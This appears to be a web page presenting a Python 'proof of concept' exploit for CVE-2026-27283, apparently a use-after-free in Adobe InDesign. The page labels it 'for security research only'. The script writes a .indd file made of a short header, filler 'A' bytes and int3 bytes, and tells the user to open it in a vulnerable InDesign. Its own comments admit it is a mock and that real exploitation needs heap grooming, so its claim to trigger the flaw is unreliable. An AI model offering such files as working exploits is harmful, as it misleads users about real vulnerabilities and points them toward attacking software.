PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept (PoC) Concept for CVE-2026-27283 # Note: Actual exploitation requires specific file format crafting (binary manipulation). # This script demonstrates the concept of triggering the vulnerability via file interaction. import struct def create_malicious_indd(filename): """ Creates a dummy file that simulates the structure required to potentially trigger the UAF. Real exploitation involves precise heap grooming. """ with open(filename, 'wb') as f: # Generic header (Mock) f.write(b'\x06\x06\xED\xF5') # Simulating the object that gets freed f.write(b'A' * 0x100) # Simulating the reallocation/exploit payload # In a real UAF, this area would be controlled by the attacker payload = b'\xCC' * 0x50 # Int3 instructions for demo crash f.write(payload) print(f"[+] Generated potential trigger file: {filename}") print(f"[+] Analysis: Open this file in a vulnerable version of InDesign to observe behavior.") if __name__ == "__main__": create_malicious_indd("cve_2026_27283_poc.indd")
